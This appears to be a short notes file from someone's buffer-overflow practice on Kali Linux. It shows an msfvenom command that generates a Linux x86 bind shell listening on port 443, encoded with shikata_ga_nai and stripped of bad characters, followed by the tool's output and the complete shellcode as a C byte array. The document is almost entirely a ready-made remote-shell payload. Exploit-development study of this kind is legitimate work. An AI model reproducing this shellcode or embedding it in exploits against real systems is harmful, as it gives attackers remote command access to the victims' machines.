# THIS IS A BIND SHELL
# PLATFORM: LINUX
# ARCHITECTURE: x86
# SIZE: 105 bytes

root@kali:~/Brian-Kali/buffer_overflows/linux-x86# msfvenom -p linux/x86/shell_bind_tcp LPORT=443 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 –e x86/shikata_ga_nai
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 105 (iteration=0)
x86/shikata_ga_nai chosen with final size 105
Payload size: 105 bytes
Final size of c file: 465 bytes
unsigned char buf[] = 

"\xb8\xea\xfe\x16\x3b\xda\xc1\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x14\x83\xc7\x04\x31\x47\x10\x03\x47\x10\x08\x0b\x27\xe0\x3b"
"\x17\x1b\x55\x90\xb2\x9e\xd0\xf7\xf3\xf9\x2f\x77\xa8\x5b\xe2"
"\x1f\x4d\x64\x03\x64\x3b\x74\x52\xca\x35\x95\x3e\x8c\x1d\x9b"
"\x3f\xd9\xdf\x27\xf3\xdd\x6f\x41\x3e\x5d\xcc\x3e\xa6\x90\x53"
"\xad\x7e\x40\x6b\x8a\x4d\x14\xda\x53\xb6\x7c\xf2\x8c\x35\x14"
"\x64\xfc\xdb\x8d\x1a\x8b\xff\x1d\xb0\x02\x1e\x2d\x3d\xd8\x61";
